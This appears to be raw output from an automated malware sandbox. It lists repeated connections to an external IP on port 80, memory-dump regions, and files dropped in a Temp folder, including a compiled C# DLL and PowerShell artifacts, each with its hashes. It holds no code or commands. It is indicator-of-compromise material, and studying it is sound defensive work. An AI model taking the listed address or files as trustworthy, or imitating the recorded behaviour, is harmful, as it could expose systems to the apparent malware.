CH 194.182.164.149:80 194.182.164.149 tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp

Files

memory/2156-5-0x00007FF7D9E50000-0x00007FF7D9E60000-memory.dmp

memory/2156-4-0x00007FF7D9E50000-0x00007FF7D9E60000-memory.dmp

memory/2156-3-0x00007FF7D9E50000-0x00007FF7D9E60000-memory.dmp

memory/2156-2-0x00007FF7D9E50000-0x00007FF7D9E60000-memory.dmp

memory/2156-1-0x00007FF819E6D000-0x00007FF819E6E000-memory.dmp

memory/2156-0-0x00007FF7D9E50000-0x00007FF7D9E60000-memory.dmp

memory/2156-9-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

memory/2156-8-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

memory/2156-7-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

memory/2156-11-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

memory/2156-12-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

memory/2156-13-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

memory/2156-14-0x00007FF7D7BF0000-0x00007FF7D7C00000-memory.dmp

memory/2156-10-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

memory/2156-6-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

memory/2156-15-0x00007FF7D7BF0000-0x00007FF7D7C00000-memory.dmp

memory/2156-16-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

memory/2156-21-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

memory/2156-20-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

memory/2156-19-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

memory/2156-18-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

memory/2156-17-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

memory/2156-31-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

memory/2156-30-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3u3mv11f.e1c.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/632-46-0x0000028C6CB80000-0x0000028C6CBA2000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\xpvmsg0o\xpvmsg0o.0.cs

MD5 f4dd5c682eb7b3b679f084261bfc7c4c
SHA1 70f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA256 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA512 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

\??\c:\Users\Admin\AppData\Local\Temp\xpvmsg0o\xpvmsg0o.cmdline

MD5 c54b1847205e6289c4fad1c22fbbefe8
SHA1 58163628023bebaf23739ef66cdcc21f52dff0fe
SHA256 edb37127d3d01af43cc4c319f570bff7c684bee90c03b7d99150e4c63b7ef3cf
SHA512 5b016557261cecf6ee214b2a362c2c73627b9936233c82394d56d05d5bbb8025bf1b41780126be5f9835ebd249318212c4a87ca2ea8effaa12568c4e67e26cdf

\??\c:\Users\Admin\AppData\Local\Temp\xpvmsg0o\CSC10AE9CB6BFF74E9F9A7E3E47CB7F897F.TMP

MD5 458027e9cfdde1ffdac4e1387777fcf7
SHA1 cff3315ea3f37f8c461cfc198ad43f64e704567c
SHA256 c72c9893355ab3f80a6944088df41221f441884cfe8fef6e01485e2b7c3266b4
SHA512 8823b0e5a0ff9f528fd5d42c6a37f651ea267664cbe220c0c2baa6936477b5d193d1706d371173adab9e0c335ee68fd06dcb26aab38b5f4beb59c3d6481f499c

C:\Users\Admin\AppData\Local\Temp\RES79C4.tmp

MD5 7e0abd51747736297feda76c250d26d3
SHA1 d8fda7de6883d85f2cd1d844a3defb56a954c0df
SHA256 90a44cf74b8a3670e19e70f7df95eecd92073b37a3d41a2c8d7167865f1ecffa
SHA512 adb6a338c71968236db0cad8aab12ff6d459caf64d0ba50f56c34b5c1f09fb2c37c210aa520733675c1dbefdb76b56e9f81e77e6bb7815f091538916653d9da8

C:\Users\Admin\AppData\Local\Temp\xpvmsg0o\xpvmsg0o.dll

MD5 816da5b1a7277b7172992a4659047720
SHA1 a06ba4aa3c81f5fe92b75d377320fc4c672c6e5f
SHA256 71558b1fd2df5e7535a37740dc864738825db58a688693fabcd12a90298192a4
SHA512 4124175d416aeb126d1589d2900e76a7193b029cc12b15536cc95ef910f782a90c8dfa65dfd0486f3464f4c1aa01dd93096c1bf400ce6ce2bd4da998ed4a80bb

memory/632-59-0x0000028C6C420000-0x0000028C6C428000-memory.dmp

memory/2156-63-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

memory/2156-64-0x00007FF819E6D000-0x00007FF819E6E000-memory.dmp

memory/632-65-0x0000028C6D330000-0x0000028C6DDAE000-memory.dmp

memory/632-67-0x0000028C6E830000-0x0000028C6F316000-memory.dmp

memory/632-66-0x0000028C6E830000-0x0000028C6F316000-memory.dmp

memory/632-68-0x0000028C6E830000-0x0000028C6F316000-memory.dmp

memory/632-69-0x0000028C6E830000-0x0000028C6F316000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 05e79935dc65b602002c4c27f265e96d
SHA1 c40e8392e84405bf8cc64beb0afc0bce95c02143
SHA256 405411e2fe9298412c0e211bf38cd51f3686c379d2262f04b2be5697cf30b877
SHA512 08b52937cb368759ff1669f7e8476882083fd34f04143916b99411eb11c1e04a687fd49752c26b48d6d3dc41e0461b47d6182ee7e2d7e69515aaf7a61c095704

memory/2156-78-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

memory/632-80-0x0000028C6E830000-0x0000028C6F316000-memory.dmp